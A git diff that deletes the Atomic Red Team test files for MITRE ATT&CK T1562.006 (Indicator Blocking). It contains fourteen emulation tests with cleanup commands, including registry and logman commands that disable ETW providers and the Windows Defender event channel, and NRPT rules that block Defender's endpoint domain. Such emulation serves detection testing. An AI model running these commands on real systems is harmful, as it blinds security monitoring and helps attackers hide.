diff --git a/atomics/T1562.006/T1562.006.md b/atomics/T1562.006/T1562.006.md
deleted file mode 100644
index 56970434..00000000
--- a/atomics/T1562.006/T1562.006.md
+++ /dev/null
@@ -1,407 +0,0 @@
-# T1562.006 - Impair Defenses: Indicator Blocking
-
-## Description from ATT&CK
-
-> An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting(Citation: Microsoft Lamin Sept 2017) or even disabling host-based sensors, such as Event Tracing for Windows (ETW)(Citation: Microsoft About Event Tracing 2018), by tampering settings that control the collection and flow of event telemetry.(Citation: Medium Event Tracing Tampering 2018) These settings may be stored on the system in configuration files and/or in the Registry as well as being accessible via administrative utilities such as [PowerShell](https://attack.mitre.org/techniques/T1059/001) or [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).
-> 
-> For example, adversaries may modify the `File` value in <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security</code> to hide their malicious actions in a new or different .evtx log file. This action does not require a system reboot and takes effect immediately.(Citation: disable_win_evt_logging)
-> 
-> ETW interruption can be achieved multiple ways, however most directly by defining conditions using the [PowerShell](https://attack.mitre.org/techniques/T1059/001) <code>Set-EtwTraceProvider</code> cmdlet or by interfacing directly with the Registry to make alterations.
-> 
-> In the case of network-based reporting of indicators, an adversary may block traffic associated with reporting to prevent central analysis. This may be accomplished by many means, such as stopping a local process responsible for forwarding telemetry and/or creating a host-based firewall rule to block traffic to specific hosts responsible for aggregating events, such as security information and event management (SIEM) products.
-> 
-> In Linux environments, adversaries may disable or reconfigure log processing tools such as syslog or nxlog to inhibit detection and monitoring capabilities to facilitate follow on behaviors. (Citation: LemonDuck) ESXi also leverages syslog, which can be reconfigured via commands such as `esxcli system syslog config set` and `esxcli system syslog config reload`.(Citation: Google Cloud Threat Intelligence ESXi VIBs 2022)(Citation: Broadcom Configuring syslog on ESXi)
-
-[Source](https://attack.mitre.org/techniques/T1562/006)
-
-## Atomic Tests
-
-- [Atomic Test #1: Auditing Configuration Changes on Linux Host](#atomic-test-1-auditing-configuration-changes-on-linux-host)
-- [Atomic Test #2: Auditing Configuration Changes on FreeBSD Host](#atomic-test-2-auditing-configuration-changes-on-freebsd-host)
-- [Atomic Test #3: Logging Configuration Changes on Linux Host](#atomic-test-3-logging-configuration-changes-on-linux-host)
-- [Atomic Test #4: Logging Configuration Changes on FreeBSD Host](#atomic-test-4-logging-configuration-changes-on-freebsd-host)
-- [Atomic Test #5: Disable Powershell ETW Provider - Windows](#atomic-test-5-disable-powershell-etw-provider---windows)
-- [Atomic Test #6: Disable .NET Event Tracing for Windows Via Registry (cmd)](#atomic-test-6-disable-net-event-tracing-for-windows-via-registry-cmd)
-- [Atomic Test #7: Disable .NET Event Tracing for Windows Via Registry (powershell)](#atomic-test-7-disable-net-event-tracing-for-windows-via-registry-powershell)
-- [Atomic Test #8: LockBit Black - Disable the ETW Provider of Windows Defender -cmd](#atomic-test-8-lockbit-black---disable-the-etw-provider-of-windows-defender--cmd)
-- [Atomic Test #9: LockBit Black - Disable the ETW Provider of Windows Defender -Powershell](#atomic-test-9-lockbit-black---disable-the-etw-provider-of-windows-defender--powershell)
-- [Atomic Test #10: Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - Cmd](#atomic-test-10-disable-net-event-tracing-for-windows-via-environment-variable-hkcu-registry---cmd)
-- [Atomic Test #11: Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - PowerShell](#atomic-test-11-disable-net-event-tracing-for-windows-via-environment-variable-hkcu-registry---powershell)
-- [Atomic Test #12: Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - Cmd](#atomic-test-12-disable-net-event-tracing-for-windows-via-environment-variable-hklm-registry---cmd)
-- [Atomic Test #13: Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - PowerShell](#atomic-test-13-disable-net-event-tracing-for-windows-via-environment-variable-hklm-registry---powershell)
-- [Atomic Test #14: Block Cybersecurity communication by leveraging Windows Name Resolution Policy Table](#atomic-test-14-block-cybersecurity-communication-by-leveraging-windows-name-resolution-policy-table)
-
-### Atomic Test #1: Auditing Configuration Changes on Linux Host
-
-Emulates modification of auditd configuration files
-
-**Supported Platforms:** Linux
-
-**auto_generated_guid:** `212cfbcf-4770-4980-bc21-303e37abd0e3`
-
-#### Inputs
-
-| Name | Description | Type | Default Value |
-|------|-------------|------|---------------|
-| audisp_config_file_name | The name of the audispd configuration file to be changed | string | audispd.conf|
-| auditd_config_file_name | The name of the auditd configuration file to be changed | string | auditd.conf|
-| libaudit_config_file_name | The name of the libaudit configuration file to be changed | string | libaudit.conf|
-
-#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)
-
-```bash
-sed -i '$ a #art_test_1562_006_1' /etc/audisp/#{audisp_config_file_name}
-if [ -f "/etc/#{auditd_config_file_name}" ];
-then sed -i '$ a #art_test_1562_006_1' /etc/#{auditd_config_file_name}
-else sed -i '$ a #art_test_1562_006_1' /etc/audit/#{auditd_config_file_name}
-fi 
-sed -i '$ a #art_test_1562_006_1' /etc/#{libaudit_config_file_name}
-```
-
-#### Cleanup Commands
-
-```bash
-sed -i '$ d' /etc/audisp/#{audisp_config_file_name}
-if [ -f "/etc/#{auditd_config_file_name}" ];
-then sed -i '$ d' /etc/#{auditd_config_file_name}
-else sed -i '$ d' /etc/audit/#{auditd_config_file_name}
-fi
-sed -i '$ d' /etc/#{libaudit_config_file_name}
-```
-### Atomic Test #2: Auditing Configuration Changes on FreeBSD Host
-
-Emulates modification of auditd configuration files
-
-**Supported Platforms:** Linux
-
-**auto_generated_guid:** `cedaf7e7-28ee-42ab-ba13-456abd35d1bd`
-
-#### Inputs
-
-| Name | Description | Type | Default Value |
-|------|-------------|------|---------------|
-| auditd_config_file_name | The name of the auditd configuration file to be changed | string | audit_event|
-
-#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
-
-```sh
-echo '#art_test_1562_006_1' >> /etc/security/#{auditd_config_file_name}
-```
-
-#### Cleanup Commands
-
-```sh
-sed -i "" '/#art_test_1562_006_1/d' /etc/security/#{auditd_config_file_name}
-```
-### Atomic Test #3: Logging Configuration Changes on Linux Host
-
-Emulates modification of syslog configuration.
-
-**Supported Platforms:** Linux
-
-**auto_generated_guid:** `7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c`
-
-#### Inputs
-
-| Name | Description | Type | Default Value |
-|------|-------------|------|---------------|
-| syslog_config_file_name | The name of the syslog configuration file to be changed | string | syslog.conf|
-| rsyslog_config_file_name | The name of the rsyslog configuration file to be changed | string | rsyslog.conf|
-| syslog_ng_config_file_name | The name of the syslog-ng configuration file to be changed | string | syslog-ng.conf|
-
-#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)
-
-```bash
-if [ -f "/etc/#{syslog_config_file_name}" ];
-then sed -i '$ a #art_test_1562_006_2' /etc/#{syslog_config_file_name}
-fi
-if [ -f "/etc/#{rsyslog_config_file_name}" ];
-then sed -i '$ a #art_test_1562_006_2' /etc/#{rsyslog_config_file_name}
-fi
-if [ -f "/etc/syslog-ng/#{syslog_ng_config_file_name}" ];
-then sed -i '$ a #art_test_1562_006_2' /etc/syslog-ng/#{syslog_ng_config_file_name}
-fi
-```
-
-#### Cleanup Commands
-
-```bash
-if [ -f "/etc/#{syslog_config_file_name}" ];
-then sed -i '$ d' /etc/#{syslog_config_file_name}
-fi
-if [ -f "/etc/#{rsyslog_config_file_name}" ];
-then sed -i '$ d' /etc/#{rsyslog_config_file_name}
-fi
-if [ -f "/etc/syslog-ng/#{syslog_ng_config_file_name}" ];
-then sed -i '$ d' /etc/syslog-ng/#{syslog_ng_config_file_name}
-fi
-```
-### Atomic Test #4: Logging Configuration Changes on FreeBSD Host
-
-Emulates modification of syslog configuration.
-
-**Supported Platforms:** Linux
-
-**auto_generated_guid:** `6b8ca3ab-5980-4321-80c3-bcd77c8daed8`
-
-#### Inputs
-
-| Name | Description | Type | Default Value |
-|------|-------------|------|---------------|
-| syslog_config_file_name | The name of the syslog configuration file to be changed | string | syslog.conf|
-
-#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
-
-```sh
-if [ -f "/etc/#{syslog_config_file_name}" ];
-then echo '#art_test_1562_006_2' >> /etc/#{syslog_config_file_name}
-fi
-```
-
-#### Cleanup Commands
-
-```sh
-if [ -f "/etc/#{syslog_config_file_name}" ];
-then sed -i "" '/#art_test_1562_006_2/d' /etc/#{syslog_config_file_name}
-fi
-```
-### Atomic Test #5: Disable Powershell ETW Provider - Windows
-
-This test was created to disable the Microsoft Powershell ETW provider by using the built-in Windows tool, logman.exe. This provider is used as a common source of telemetry in AV/EDR solutions.
-
-**Supported Platforms:** Windows
-
-**auto_generated_guid:** `6f118276-121d-4c09-bb58-a8fb4a72ee84`
-
-#### Inputs
-
-| Name | Description | Type | Default Value |
-|------|-------------|------|---------------|
-| ps_exec_location | Location of PSExec. | string | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;pstools&#92;PsExec.exe|
-| session | The session to disable. | string | EventLog-Application|
-| provider | The provider to disable. | string | Microsoft-Windows-Powershell|
-
-#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
-
-```powershell
-cmd /c "#{ps_exec_location}" -accepteula -i -s cmd.exe /c logman update trace "#{session}" --p "#{provider}" -ets
-```
-
-#### Cleanup Commands
-
-```powershell
-cmd /c "#{ps_exec_location}" -i -s cmd.exe /c logman update trace "#{session}" -p "#{provider}" -ets
-```
-
-#### Dependencies: Run with `powershell`!
-
-##### Description: PSExec must be installed on the machine.
-
-###### Check Prereq Commands
-
-```powershell
-if (Test-Path "#{ps_exec_location}") {exit 0} else {exit 1}
-```
-
-###### Get Prereq Commands
-
-```powershell
-New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
-Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PStools.zip"
-expand-archive -literalpath "PathToAtomicsFolder\..\ExternalPayloads\PStools.zip" -destinationpath "PathToAtomicsFolder\..\ExternalPayloads\pstools" -force
-```
-
-### Atomic Test #6: Disable .NET Event Tracing for Windows Via Registry (cmd)
-
-Disables ETW for the .NET Framework using the reg.exe utility to update the Windows registry
-
-**Supported Platforms:** Windows
-
-**auto_generated_guid:** `8a4c33be-a0d3-434a-bee6-315405edbd5b`
-
-#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
-
-```cmd
-REG ADD HKLM\Software\Microsoft\.NETFramework /v ETWEnabled /t REG_DWORD /d 0
-```
-
-#### Cleanup Commands
-
-```cmd
-REG DELETE HKLM\Software\Microsoft\.NETFramework /v ETWEnabled /f > nul 2>&1
-```
-### Atomic Test #7: Disable .NET Event Tracing for Windows Via Registry (powershell)
-
-Disables ETW for the .NET Framework using PowerShell to update the Windows registry
-
-**Supported Platforms:** Windows
-
-**auto_generated_guid:** `19c07a45-452d-4620-90ed-4c34fffbe758`
-
-#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
-
-```powershell
-New-ItemProperty -Path HKLM:\Software\Microsoft\.NETFramework -Name ETWEnabled -Value 0 -PropertyType "DWord" -Force
-```
-
-#### Cleanup Commands
-
-```powershell
-REG DELETE HKLM\Software\Microsoft\.NETFramework /v ETWEnabled /f > $null 2>&1
-```
-### Atomic Test #8: LockBit Black - Disable the ETW Provider of Windows Defender -cmd
-
-An adversary can disable the ETW Provider of Windows Defender,
-so nothing would be logged to Microsoft-Windows-Windows-Defender/Operational anymore.
-https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a
-
-**Supported Platforms:** Windows
-
-**auto_generated_guid:** `f6df0b8e-2c83-44c7-ba5e-0fa4386bec41`
-
-#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
-
-```cmd
-reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" /v Enabled /t REG_DWORD /d 0 /f
-```
-
-#### Cleanup Commands
-
-```cmd
-reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" /v Enabled /f >nul 2>&1
-```
-### Atomic Test #9: LockBit Black - Disable the ETW Provider of Windows Defender -Powershell
-
-An adversary can disable the ETW Provider of Windows Defender,
-so nothing would be logged to Microsoft-Windows-Windows-Defender/Operational anymore.
-https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a
-
-**Supported Platforms:** Windows
-
-**auto_generated_guid:** `69fc085b-5444-4879-8002-b24c8e1a3e02`
-
-#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
-
-```powershell
-New-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" -Name Enabled  -PropertyType DWord -Value 0 -Force
-```
-
-#### Cleanup Commands
-
-```powershell
-Remove-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" -Name Enabled -Force -ErrorAction Ignore
-```
-### Atomic Test #10: Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - Cmd
-
-Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKCU registry using the reg.exe utility. In order for changes to take effect a logout might be required.
-
-**Supported Platforms:** Windows
-
-**auto_generated_guid:** `fdac1f79-b833-4bab-b4a1-11b1ed676a4b`
-
-#### Attack Commands: Run with `command_prompt`!
-
-```cmd
-REG ADD HKCU\Environment /v COMPlus_ETWEnabled /t REG_SZ /d 0 /f
-```
-
-#### Cleanup Commands
-
-```cmd
-REG DELETE HKCU\Environment /v COMPlus_ETWEnabled /f > nul 2>&1
-```
-### Atomic Test #11: Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - PowerShell
-
-Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKCU registry using PowerShell. In order for changes to take effect a logout might be required.
-
-**Supported Platforms:** Windows
-
-**auto_generated_guid:** `b42c1f8c-399b-47ae-8fd8-763181395fee`
-
-#### Attack Commands: Run with `powershell`!
-
-```powershell
-New-ItemProperty -Path HKCU:\Environment -Name COMPlus_ETWEnabled -Value 0 -PropertyType "String" -Force
-```
-
-#### Cleanup Commands
-
-```powershell
-Remove-ItemProperty -Path HKCU:\Environment -Name COMPlus_ETWEnabled
-```
-### Atomic Test #12: Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - Cmd
-
-Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKLM registry using the reg.exe utility. In order for changes to take effect a reboot might be required.
-
-**Supported Platforms:** Windows
-
-**auto_generated_guid:** `110b4281-43fe-405f-a184-5d8eaf228ebf`
-
-#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
-
-```cmd
-REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v COMPlus_ETWEnabled /t REG_SZ /d 0 /f
-```
-
-#### Cleanup Commands
-
-```cmd
-REG DELETE "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v COMPlus_ETWEnabled /f > nul 2>&1
-```
-### Atomic Test #13: Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - PowerShell
-
-Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKLM registry using PowerShell. In order for changes to take effect a reboot might be required.
-
-**Supported Platforms:** Windows
-
-**auto_generated_guid:** `4d61779d-be7f-425c-b560-0cafb2522911`
-
-#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
-
-```powershell
-New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" -Name COMPlus_ETWEnabled -Value 0 -PropertyType "String" -Force
-```
-
-#### Cleanup Commands
-
-```powershell
-Remove-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" -Name COMPlus_ETWEnabled
-```
-### Atomic Test #14: Block Cybersecurity communication by leveraging Windows Name Resolution Policy Table
-
-Adversaries are redirecting DNS queries to an incorrect or malicious DNS server IP, thereby blocking legitimate communications and potentially compromising the security infrastructure. This atomic test aims to respond with 127.0.0.1 when a DNS query is made for endpoint.security.microsoft.com.
-
-**Supported Platforms:** Windows
-
-**auto_generated_guid:** `1174b5df-2c33-490f-8854-f5eb80c907ca`
-
-#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
-
-```powershell
-Add-DnsClientNrptRule -Namespace ".endpoint.security.microsoft.com" -NameServers 127.0.0.1 -Comment "Silenced by Name Resolution Policy Table"
-Add-DnsClientNrptRule -Namespace "endpoint.security.microsoft.com" -NameServers 127.0.0.1 -Comment "Silenced by Name Resolution Policy Table"
-Clear-DnsClientCache
-```
-
-#### Cleanup Commands
-
-```powershell
-try {
-    # Get all current NRPT rules
-        $DnsClientNrptRules = Get-DnsClientNrptRule | Where-Object { $_.Comment -eq 'Silenced by Name Resolution Policy Table' }
-    
-    # Remove each NRPT rule
-        foreach ($rule in $DnsClientNrptRules) {
-            Remove-DnsClientNrptRule -Name $rule.Name -Force
-        }
-    
-    # Clear DNS client cache
-    Clear-DnsClientCache
-    Write-Host "All NRPT rules have been removed and the DNS cache has been cleared."
-}
-
-catch {
-    Write-Host "An error occurred: $_"
-}
-Clear-DnsClientCache
-```
diff --git a/atomics/T1562.006/T1562.006.yaml b/atomics/T1562.006/T1562.006.yaml
deleted file mode 100644
index b5745587..00000000
--- a/atomics/T1562.006/T1562.006.yaml
+++ /dev/null
@@ -1,272 +0,0 @@
-attack_technique: T1562.006
-display_name: 'Impair Defenses: Indicator Blocking'
-atomic_tests:
-- name: 'Auditing Configuration Changes on Linux Host'
-  auto_generated_guid: 212cfbcf-4770-4980-bc21-303e37abd0e3
-  description: |
-    Emulates modification of auditd configuration files
-  supported_platforms:
-  - linux
-  input_arguments:
-    audisp_config_file_name:
-      description: The name of the audispd configuration file to be changed
-      type: string
-      default: audispd.conf
-    auditd_config_file_name:
-      description: The name of the auditd configuration file to be changed
-      type: string
-      default: auditd.conf
-    libaudit_config_file_name:
-      description: The name of the libaudit configuration file to be changed
-      type: string
-      default: libaudit.conf
-  executor:
-    command: |
-      sed -i '$ a #art_test_1562_006_1' /etc/audisp/#{audisp_config_file_name}
-      if [ -f "/etc/#{auditd_config_file_name}" ];
-      then sed -i '$ a #art_test_1562_006_1' /etc/#{auditd_config_file_name}
-      else sed -i '$ a #art_test_1562_006_1' /etc/audit/#{auditd_config_file_name}
-      fi 
-      sed -i '$ a #art_test_1562_006_1' /etc/#{libaudit_config_file_name}
-    cleanup_command: |
-      sed -i '$ d' /etc/audisp/#{audisp_config_file_name}
-      if [ -f "/etc/#{auditd_config_file_name}" ];
-      then sed -i '$ d' /etc/#{auditd_config_file_name}
-      else sed -i '$ d' /etc/audit/#{auditd_config_file_name}
-      fi
-      sed -i '$ d' /etc/#{libaudit_config_file_name}
-    name: bash
-    elevation_required: true
-- name: 'Auditing Configuration Changes on FreeBSD Host'
-  auto_generated_guid: cedaf7e7-28ee-42ab-ba13-456abd35d1bd
-  description: |
-    Emulates modification of auditd configuration files
-  supported_platforms:
-  - linux
-  input_arguments:
-    auditd_config_file_name:
-      description: The name of the auditd configuration file to be changed
-      type: string
-      default: audit_event
-  executor:
-    command: |
-      echo '#art_test_1562_006_1' >> /etc/security/#{auditd_config_file_name}
-    cleanup_command: |
-      sed -i "" '/#art_test_1562_006_1/d' /etc/security/#{auditd_config_file_name}
-    name: sh
-    elevation_required: true
-- name: 'Logging Configuration Changes on Linux Host'
-  auto_generated_guid: 7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c
-  description: |
-    Emulates modification of syslog configuration.
-  supported_platforms:
-  - linux
-  input_arguments:
-    syslog_config_file_name:
-      description: The name of the syslog configuration file to be changed
-      type: string
-      default: syslog.conf
-    rsyslog_config_file_name:
-      description: The name of the rsyslog configuration file to be changed
-      type: string
-      default: rsyslog.conf
-    syslog_ng_config_file_name:
-      description: The name of the syslog-ng configuration file to be changed
-      type: string
-      default: syslog-ng.conf
-  executor:
-    command: |
-      if [ -f "/etc/#{syslog_config_file_name}" ];
-      then sed -i '$ a #art_test_1562_006_2' /etc/#{syslog_config_file_name}
-      fi
-      if [ -f "/etc/#{rsyslog_config_file_name}" ];
-      then sed -i '$ a #art_test_1562_006_2' /etc/#{rsyslog_config_file_name}
-      fi
-      if [ -f "/etc/syslog-ng/#{syslog_ng_config_file_name}" ];
-      then sed -i '$ a #art_test_1562_006_2' /etc/syslog-ng/#{syslog_ng_config_file_name}
-      fi
-    cleanup_command: |
-      if [ -f "/etc/#{syslog_config_file_name}" ];
-      then sed -i '$ d' /etc/#{syslog_config_file_name}
-      fi
-      if [ -f "/etc/#{rsyslog_config_file_name}" ];
-      then sed -i '$ d' /etc/#{rsyslog_config_file_name}
-      fi
-      if [ -f "/etc/syslog-ng/#{syslog_ng_config_file_name}" ];
-      then sed -i '$ d' /etc/syslog-ng/#{syslog_ng_config_file_name}
-      fi
-    name: bash
-    elevation_required: true
-- name: 'Logging Configuration Changes on FreeBSD Host'
-  auto_generated_guid: 6b8ca3ab-5980-4321-80c3-bcd77c8daed8
-  description: |
-    Emulates modification of syslog configuration.
-  supported_platforms:
-  - linux
-  input_arguments:
-    syslog_config_file_name:
-      description: The name of the syslog configuration file to be changed
-      type: string
-      default: syslog.conf
-  executor:
-    command: |
-      if [ -f "/etc/#{syslog_config_file_name}" ];
-      then echo '#art_test_1562_006_2' >> /etc/#{syslog_config_file_name}
-      fi
-    cleanup_command: |
-      if [ -f "/etc/#{syslog_config_file_name}" ];
-      then sed -i "" '/#art_test_1562_006_2/d' /etc/#{syslog_config_file_name}
-      fi
-    name: sh
-    elevation_required: true
-
-- name: Disable Powershell ETW Provider - Windows
-  auto_generated_guid: 6f118276-121d-4c09-bb58-a8fb4a72ee84
-  description: This test was created to disable the Microsoft Powershell ETW provider by using the built-in Windows tool, logman.exe. This provider is used as a common source of telemetry in AV/EDR solutions.
-  supported_platforms:
-  - windows
-  input_arguments:
-    ps_exec_location:
-      description: Location of PSExec.
-      type: string
-      default: PathToAtomicsFolder\..\ExternalPayloads\pstools\PsExec.exe
-    session:
-      description: The session to disable.
-      type: string
-      default: EventLog-Application
-    provider:
-      description: The provider to disable.
-      type: string
-      default: Microsoft-Windows-Powershell
-  dependency_executor_name: powershell
-  dependencies:
-  - description: PSExec must be installed on the machine.
-    prereq_command: if (Test-Path "#{ps_exec_location}") {exit 0} else {exit 1}
-    get_prereq_command: |-
-      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
-      Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PStools.zip"
-      expand-archive -literalpath "PathToAtomicsFolder\..\ExternalPayloads\PStools.zip" -destinationpath "PathToAtomicsFolder\..\ExternalPayloads\pstools" -force
-  executor:
-    command: cmd /c "#{ps_exec_location}" -accepteula -i -s cmd.exe /c logman update trace "#{session}" --p "#{provider}" -ets
-    cleanup_command: cmd /c "#{ps_exec_location}" -i -s cmd.exe /c logman update trace "#{session}" -p "#{provider}" -ets
-    name: powershell
-    elevation_required: true
-- name: Disable .NET Event Tracing for Windows Via Registry (cmd)
-  auto_generated_guid: 8a4c33be-a0d3-434a-bee6-315405edbd5b
-  description: Disables ETW for the .NET Framework using the reg.exe utility to update the Windows registry
-  supported_platforms:
-  - windows
-  executor:
-    command: REG ADD HKLM\Software\Microsoft\.NETFramework /v ETWEnabled /t REG_DWORD /d 0
-    cleanup_command: REG DELETE HKLM\Software\Microsoft\.NETFramework /v ETWEnabled /f > nul 2>&1
-    name: command_prompt
-    elevation_required: true
-- name: Disable .NET Event Tracing for Windows Via Registry (powershell)
-  auto_generated_guid: 19c07a45-452d-4620-90ed-4c34fffbe758
-  description: Disables ETW for the .NET Framework using PowerShell to update the Windows registry
-  supported_platforms:
-  - windows
-  executor:
-    command: New-ItemProperty -Path HKLM:\Software\Microsoft\.NETFramework -Name ETWEnabled -Value 0 -PropertyType "DWord" -Force
-    cleanup_command: REG DELETE HKLM\Software\Microsoft\.NETFramework /v ETWEnabled /f > $null 2>&1
-    name: powershell
-    elevation_required: true
-- name: LockBit Black - Disable the ETW Provider of Windows Defender -cmd
-  auto_generated_guid: f6df0b8e-2c83-44c7-ba5e-0fa4386bec41
-  description: |
-    An adversary can disable the ETW Provider of Windows Defender,
-    so nothing would be logged to Microsoft-Windows-Windows-Defender/Operational anymore.
-    https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a
-  supported_platforms:
-  - windows
-  executor:
-    command: |
-      reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" /v Enabled /t REG_DWORD /d 0 /f
-    cleanup_command: |
-      reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" /v Enabled /f >nul 2>&1
-    name: command_prompt
-    elevation_required: true
-- name: LockBit Black - Disable the ETW Provider of Windows Defender -Powershell
-  auto_generated_guid: 69fc085b-5444-4879-8002-b24c8e1a3e02
-  description: |
-    An adversary can disable the ETW Provider of Windows Defender,
-    so nothing would be logged to Microsoft-Windows-Windows-Defender/Operational anymore.
-    https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a
-  supported_platforms:
-  - windows
-  executor:
-    command: |
-      New-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" -Name Enabled  -PropertyType DWord -Value 0 -Force
-    cleanup_command: |
-      Remove-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" -Name Enabled -Force -ErrorAction Ignore
-    name: powershell
-    elevation_required: true
-- name: Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - Cmd
-  auto_generated_guid: fdac1f79-b833-4bab-b4a1-11b1ed676a4b
-  description: Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKCU registry using the reg.exe utility. In order for changes to take effect a logout might be required.
-  supported_platforms:
-  - windows
-  executor:
-    command: REG ADD HKCU\Environment /v COMPlus_ETWEnabled /t REG_SZ /d 0 /f
-    cleanup_command: REG DELETE HKCU\Environment /v COMPlus_ETWEnabled /f > nul 2>&1
-    name: command_prompt
-- name: Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - PowerShell
-  auto_generated_guid: b42c1f8c-399b-47ae-8fd8-763181395fee
-  description: Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKCU registry using PowerShell. In order for changes to take effect a logout might be required.
-  supported_platforms:
-  - windows
-  executor:
-    command: New-ItemProperty -Path HKCU:\Environment -Name COMPlus_ETWEnabled -Value 0 -PropertyType "String" -Force
-    cleanup_command: Remove-ItemProperty -Path HKCU:\Environment -Name COMPlus_ETWEnabled
-    name: powershell
-- name: Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - Cmd
-  auto_generated_guid: 110b4281-43fe-405f-a184-5d8eaf228ebf
-  description: Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKLM registry using the reg.exe utility. In order for changes to take effect a reboot might be required.
-  supported_platforms:
-  - windows
-  executor:
-    command: REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v COMPlus_ETWEnabled /t REG_SZ /d 0 /f
-    cleanup_command: REG DELETE "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v COMPlus_ETWEnabled /f > nul 2>&1
-    name: command_prompt
-    elevation_required: true
-- name: Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - PowerShell
-  auto_generated_guid: 4d61779d-be7f-425c-b560-0cafb2522911
-  description: Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKLM registry using PowerShell. In order for changes to take effect a reboot might be required.
-  supported_platforms:
-  - windows
-  executor:
-    command: New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" -Name COMPlus_ETWEnabled -Value 0 -PropertyType "String" -Force
-    cleanup_command: Remove-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" -Name COMPlus_ETWEnabled
-    name: powershell
-    elevation_required: true
-- name: Block Cybersecurity communication by leveraging Windows Name Resolution Policy Table
-  auto_generated_guid: 1174b5df-2c33-490f-8854-f5eb80c907ca
-  description: Adversaries are redirecting DNS queries to an incorrect or malicious DNS server IP, thereby blocking legitimate communications and potentially compromising the security infrastructure. This atomic test aims to respond with 127.0.0.1 when a DNS query is made for endpoint.security.microsoft.com.
-  supported_platforms:
-    - windows
-  executor:
-    command: |-
-      Add-DnsClientNrptRule -Namespace ".endpoint.security.microsoft.com" -NameServers 127.0.0.1 -Comment "Silenced by Name Resolution Policy Table"
-      Add-DnsClientNrptRule -Namespace "endpoint.security.microsoft.com" -NameServers 127.0.0.1 -Comment "Silenced by Name Resolution Policy Table"
-      Clear-DnsClientCache
-    cleanup_command: |-
-      try {
-          # Get all current NRPT rules
-              $DnsClientNrptRules = Get-DnsClientNrptRule | Where-Object { $_.Comment -eq 'Silenced by Name Resolution Policy Table' }
-          
-          # Remove each NRPT rule
-              foreach ($rule in $DnsClientNrptRules) {
-                  Remove-DnsClientNrptRule -Name $rule.Name -Force
-              }
-          
